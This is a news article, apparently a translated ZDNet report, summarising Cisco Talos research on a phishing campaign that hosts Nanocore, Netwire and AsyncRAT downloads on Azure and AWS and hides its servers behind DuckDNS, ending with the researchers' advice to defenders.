A recent campaign harnessing the public cloud infrastructure deploys not one, but three Remote Access Trojans (RATs) for malicious purposes. Nanocore, Netwire and AsyncRAT payloads are deployed from public cloud systems, a way for cyber attackers to avoid having to own or manage their own private paid infrastructure, explains Cisco Talos. . Hackers rely in particular on “bulletproof” hosting which could possibly arouse the interest of the police.
This abuse allows cybercriminals to exploit the resources of cloud services managed by providers such as Microsoft Azure and Amazon Web Services (AWS) for malicious purposes. “These types of cloud services like Azure and AWS allow attackers to set up their infrastructure and connect to the internet with minimal time or money commitment,” Talos researchers explain. “It also makes it more difficult for the defenders to trace the operations of the attackers. “
On Wednesday, Cisco researchers Talos Chetan Raghuprasad and Vanja Svajcer said that a new campaign based on public cloud infrastructure was discovered in October 2021 and that the majority of victims are based in the United States, Canada and Italy. However, a handful appear to be from Spain and South Korea.
A proven methodology
The chain of attacks typically begins with a phishing email, often disguised as an invoice. These messages are accompanied by .ZIP files which, when opened, reveal an ISO image. The ISO file is equipped with a malicious loader for Trojans via JavaScript, a Windows batch file, or a Visual Basic script.
If a victim tries to load the disk image, these scripts are triggered. Designed to deploy Nanocore, Netwire, and AsyncRAT, the scripts connect to a download server to grab a payload – and that’s where a public cloud service comes in.
Yet the download scripts use obfuscation techniques to disguise these activities. JavaScript contains four layers of obfuscation, with each new malicious process spawned after the previous layer has been peeled. The batch file contains obscured commands that run PowerShell to retrieve the payload, and the VBScript file also uses PowerShell commands.
Increased vigilance
A PowerShell dropper built with HCrypt has also been detected. The attackers behind this campaign manage a variety of malicious payload hosts, Command and Control (C2) servers, and subdomains. The majority of servers detected so far are hosted on Azure and AWS. “Some of the download servers are running the Apache web server application,” the researchers say. “HTTP servers are configured to allow referencing of open directories that contain variants of NanocoreRATs, Netwire RAT and AsyncRATs malware. “
Additionally, operators abuse DuckDNS, a legitimate dynamic DNS service for pointing subdomains to IP addresses. This service is used to manage malware downloads through malicious DuckDNS subdomains and to mask the names of C2 hosts, according to Talos. Netwire, Nanocore, and AsyncRAT are popular commercial Trojan horse strains that are widely used by cyber attackers to remotely access and hijack vulnerable machines, steal user data, and perform surveillance by means including audio capture and camera. .
“Defenders need to monitor traffic to their organization and put in place robust rules around policies for running scripts on their devices,” the researchers commented. “It’s even more important for organizations to improve the security of their email messages, in order to detect and mitigate malicious email messages and break the chain of infection as early as possible. “
Source: ZDNet.com